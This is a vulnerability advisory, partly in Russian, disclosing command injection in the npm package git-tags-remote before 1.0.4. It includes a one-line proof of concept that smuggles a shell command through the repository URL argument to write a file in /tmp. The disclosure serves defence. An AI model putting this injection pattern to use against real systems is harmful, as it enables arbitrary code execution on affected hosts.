GHSA-gm9x-q798-hmr4

Опубликовано: 29 июл. 2020

Источник: github

Github: Прошло ревью

CVSS3: 7.2

Описание

Command Injection in git-tags-remote

All versions of git-tags-remote are vulnerable to Command Injection. The package fails to sanitize the repository input and passes it directly to an exec call on the get function . This may allow attackers to execute arbitrary code in the system if the repo value passed to the function is user-controlled.

The following proof-of-concept creates a file in /tmp:

const gitTagsRemote = require('git-tags-remote'); gitTagsRemote.get('https://github.com/sh0ji/git-tags-remote.git; echo "Injection Success" > /tmp/command-injection.test') .then(tags => console.log(tags));

Ссылки

https://github.com/sh0ji/git-tags-remote/issues/58
https://github.com/sh0ji/git-tags-remote/commit/a20488960cbd2c98455386108253094897ebfc1c
https://www.npmjs.com/advisories/1517

Пакеты

Наименование

git-tags-remote

npm

Затронутые версииВерсия исправления

< 1.0.4

1.0.4

7.2 High

CVSS3

Дефекты

CWE-78

7.2 High

CVSS3

Дефекты

CWE-78